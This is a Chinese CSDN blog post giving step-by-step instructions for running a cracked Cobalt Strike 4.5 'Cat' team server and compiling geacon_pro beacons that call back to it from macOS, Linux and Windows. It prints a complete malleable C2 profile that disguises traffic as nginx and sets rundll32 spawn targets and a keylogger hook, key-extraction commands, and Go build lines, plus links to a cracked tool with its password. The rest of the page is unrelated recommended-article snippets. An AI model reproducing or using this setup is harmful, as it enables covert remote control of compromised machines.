geacon_pro配合catcs4.5上线Mac、Linux

最新推荐文章于 2024-07-24 20:11:50 发布
最新推荐文章于 2024-07-24 20:11:50 发布
阅读量1.1k 收藏 1
点赞数 1
文章标签: macos linux 安全 web安全 cobaltstrike
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35664104/article/details/132348337
版权

我的个人博客: xzajyjs.cn

一些链接

Try师傅的catcs4.5项目: https://github.com/TryGOTry/CobaltStrike_Cat_4.5,最新版解压密码见:https://www.nctry.com/2708.html

geacon_pro: https://github.com/testxxxzzz/geacon_pro

BeaconTool.jar: https://xzajyjs.lanzouc.com/i76gk15ncw0j,密码:0*rL~F8<Mq

catcs4.5部署

修改server端和client端的properties,保持一致。

这里使用默认的geacon_profile进行测试,上传到server端,保存为geacon.profile:

set sleeptime "3000";

https-certificate {
    set C "KZ";
    set CN "foren.zik";
    set O "NN Fern Sub";
    set OU "NN Fern";
    set ST "KZ";
    set validity "365";
}

http-get {

	set uri "/www/handle/doc";

	client {
		metadata {
			base64url;
			prepend "SESSIONID=";
			header "Cookie";
		}
	}

	server {
		header "Server" "nginx/1.10.3 (Ubuntu)";
    		header "Content-Type" "application/octet-stream";
        	header "Connection" "keep-alive";
        	header "Vary" "Accept";
        	header "Pragma" "public";
        	header "Expires" "0";
        	header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

		output {
			mask;
			netbios;
			prepend "data=";
			append "%%";
			print;
		}
	}
}

http-post {
	set uri "/IMXo";
	client {
		
		id {				
			mask;
			netbiosu;
			parameter "doc";
		}

		output {
			mask;
			base64url;
			prepend "data=";
			append "%%";		
			print;
		}
	}

	server {
		header "Server" "nginx/1.10.3 (Ubuntu)";
    		header "Content-Type" "application/octet-stream";
        	header "Connection" "keep-alive";
       	 	header "Vary" "Accept";
        	header "Pragma" "public";
        	header "Expires" "0";
        	header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
          
		output {
			mask;
			netbios;
			prepend "data=";
			append "%%";
			print;
		}
	}
}

post-ex {
    set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";
    set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";
    
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
    set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
    set keylogger "SetWindowsHookEx";
}

然后修改CatServer.properties中的参数CatServer.profile为我们生成的profile文件

CatServer.profile = geacon.profile

运行服务端

chmod +x teamserver TeamServer.prop
sudo ./teamserver

image-20230817173558007

客户端连接

image-20230817173632855

image-20230817173813029

接下来生成一个监听器listener,主要要使用https,如果是http需要将geacon_proconfig.gosslHTTP改成"http://"

image-20230817174311268

生成geacon_pro

git clone https://github.com/testxxxzzz/geacon_pro.git
cd geacon_pro

如果使用readme中默认的profile的话config.go中有两处需要修改,

image-20230817174025846

获取RsaPublicKey

使用BeaconTool工具,读取server端的隐藏文件.cobaltstrike.beacon_keys

java -jar BeaconTool.jar -i .cobaltstrike.beacon_keys -rsa

image-20230817174511150

复制其中的PUBLIC KEY至config中对应位置,修改C2地址为监听器的url

go编译生成geacon,例如:

# arm mac
export GOOS="darwin" && export GOARCH="arm64" && go build -ldflags "-s -w" main.go
# x86 windows
export GOOS="windows" && export GOARCH="amd64" && go build -ldflags "-H windowsgui -s -w" main.go

image-20230817174824822

观察到上线成功

image-20230817175243122

xzajyjs
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
geacon:练习Go编程并在Go中实现CobaltStrike的Beacon
03-21
盖康 使用Go来实现CobaltStrike的信标 该项目仅用于学习协议分析和逆向工程,如果有人的权利受到侵犯,请与我联系以删除该项目,最后一个请勿非法使用 怎么玩 设置团队服务器并启动http许可,团队服务器将生成文件.cobaltstrike.beacon_keys 。 使用Jetbrains Idea编译BeaconTool,使用命令java -jar BeaconTool.jar将Java密钥库转换为PEM格式。 将RSA密钥对替换为cmd/config/config.go文件(不需要RSA私钥,我在代码中仅出于记录目的写了它) 无论您要运行什么平台,都可以编译geacon:例如,使用命令export GOOS="darwin" && export GOARCH="amd64" && go build cmd/main.go来编译在MacOS上运行的可执行二进制文件。 正玩得开心
推荐文章:利用Go语言实现CobaltStrike Beacon:Geacon
gitblog_00098的博客
06-10 315
推荐文章:利用Go语言实现CobaltStrike Beacon:Geacon 项目地址:https://gitcode.com/TryGOTry/edit-gencon 1. 项目介绍 在网络安全领域,渗透测试和防御策略的发展日新月异。Cobalt Strike是一款广泛使用的红队工具,其Beacon组件以其强大的功能和灵活的通信方式著名。Geacon(原名geacon)是一个开源项目,由Go语...
探索Geacon:用Go语言实现CobaltStrike的Beacon
gitblog_00053的博客
05-15 258
探索Geacon:用Go语言实现CobaltStrike的Beacon 项目地址:https://gitcode.com/darkr4y/geacon 在网络安全和渗透测试领域,CobaltStrike是一个广为人知的工具,它提供了一套高级的命令与控制(C&C)框架。而今天我们引入的项目——Geacon,是由开发者DarkRay以Go语言重构CobaltStrike的Beacon组件。这...
攻击者使用“GeaconCobalt Strike工具瞄准macOS
热门推荐
网络研究观
05-22 1万+
威胁行为者现在正在部署一种名为 GeaconCobalt Strike 的 Go 语言实现,它于四年前首次出现在 GitHub 上。他们正在使用红队和攻击模拟工具来针对 macOS 系统,其方式与过去几年在 Windows 平台上使用 Cobalt Strike 进行后开发活动的方式大致相同。
渗透测试五一版-CobaltStrike-[Cat]-4.5猫猫最终版
wdsj_xh的博客
05-24 1850
距离上次更新猫猫版已经过去几个月了,不少人来催更新,但是感觉已经没什么更新的了(除了重写beacon).这将是cat系列最后一个版本,由于本人精力不够,决定以后不会再更新.如有重大bug的话,可以维护.这个版本暂未经过大量测试,如有问题可在本贴下留言.有分享才有进步,希望大家不要藏着掖着,多多分享,互相学习,互相交流,互相进步。
CobaltStrike之Beacon命令使用
Longwaer
02-11 1198
学习掌握CobaltStrike的基础命令,更好的在渗透测试中使用。
go 二进制程序守护_Blackrota,一个Go开发的高度混淆的后门
weixin_39776344的博客
11-28 307
文章转载自Netlab三六零 概述近日,国内有关安全团队捕获到一个用 Go 语言编写的恶意后门程序,该程序利用 Docker Remote API 未授权访问漏洞来传播。由于它上线的 C2 为 blackrota.ga ,我们把它命名为 Blackrota。Blackrota 的后门程序目前只有 Linux 版,是 ELF 文件格式,支持 x86和x86-64 两种 CPU ...
secureCRT同时在所有已打开窗口执行命令、mac-os下使用的SecureCRT版本 以及 SecureCRT一段时间不操作没有响应的问题
本博客记录了从2014年以来在工作学习中遇到的技术问题、解决方法以及部分个人人生经历、经验等内容。
07-22 915
公司的服务器比较多,最近因为opcache,上线发布后,需要重启所有的WEB服务器上的php。目前使用的jenkins发布,不过账号安全问题,给jenkins的账号权限受限不能执行sudo操作。于是上线后需要手工重启一下PHP,以前服务器少的时候到也不麻烦,不过服务器多了,就不能再一台一台执行,所以需要一次性同时在所有已打开窗口执行重启php命令,secureCRT命令行工具就带有这个功能。
mac下010editor的配置文件路径
qq_53325717的博客
07-23 184
完成
PR2024中文版WIN/MAC版软件下载+pr教程
l001228的博客
07-20 972
Adobe Premiere Pro 2024是Adobe公司开发的流行视频编辑软件的最新版本,为电影、电视和网络的视频制作提供了强大的工具集。
Navicat 17 for Mac 数据库管理软件
07-21 293
效果 一、准备工作 二、开始安装 1. 双击运行软件,将其从左侧拖入右侧文件夹中,等待安装完毕。 2. 应用程序/启动台显示Navicat图标,表示安装成功。 二、运行测试 运行后提示:“Navicat Premium.pp”已损坏,无法打开。该怎么操作 打开以下文章,跟着步骤操作,完成后再重新右键打开软件即可 右键打开软件 安装完成!!!
如何在 Mac 上下载安装植物大战僵尸杂交版? 最新版本 2.2 详细安装运行教程问题详解
云储储的博客
07-19 807
植物大战僵尸最新杂交版2.2下载安装详细教程,可在 MAC 上直接安装,另外也已经将全通存档注入里面,进入游戏默认就是全通关卡,不用在一关一关的向下玩了,背包里的物资都是99999
Windows通过命令查看mac : getmac
funnycoffee123的博客
07-22 307
Windows通过命令查看mac : getmac
Mac安装Hoomebrew与升级Python版本
最新发布
weixin_44504151的博客
07-24 202
然后创建一个软链接到系统默认的python路径。# 首先找到新安装的Python版本。
MacOS解决安装pycurl的问题 no such file or directory: ‘/usr/lib/libcurl.@libext@‘
带着Bug看世界
07-21 315
Mac系统Python pip install pycurl报错,依赖的curl没有安装好。
mac无法清空废纸篓怎么办 mac废纸篓清空了如何找回 cleanmymac误删文件怎么恢复
2401_82916694的博客
07-20 1158
废纸篓相当于“一颗后悔药”,用于临时存储用户删除的文件。我们从从Mac上删除的文件,一般会进入废纸篓中。如果我们后悔了,可以从废纸篓中找回来。然而,有时我们会发现mac无法清空废纸篓,这是怎么回事?本文将探讨一些常见的解决方案。
linux、windows、macos,命令终端清屏
xzzteach的博客
07-22 684
Linux、Windows和macOS的命令终端中,清屏的命令或方法各不相同。快捷键:在Windows的某些终端模拟器中,也可以使用Ctrl+L快捷键来清屏,但这并不是所有终端都支持。命令:输入cls命令后,终端的屏幕上的内容会被清空,并且光标会回到屏幕的左上角。
macOS 和 Windows 上临时使用指定的 Java 版本
weixin_37600397的博客
07-21 417
macOS 和 Windows 上,临时使用指定的 Java 版本可以通过设置JAVA_HOME和PATH环境变量来实现。无论是在终端还是命令提示符中,都可以轻松切换 Java 版本,以满足不同应用程序或工具的需求。
划分型dp,CF 1935C - Messenger in MAC
EQUINOX1的博客
07-24 399
我们定义状态f(i, j) 为 前 i 个数 选了 j 个数 且以 (a[i], b[i]) 结尾,即第 i 个 数必选的最小 sum(a) - min(b) 的花费,这样定义是因为第 i 个数必选,那么max(b) 一定是 b[i]则 f(i + 1, j + 1) = min(f(k, j)) + a[i]枚举 k的话就变成了O(N^3),考虑维护前缀最小值,可以优化到O(N^2)时间复杂度: O(N^2)空间复杂度:O(N)滚动数组优化又可以优化空间到O(N)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值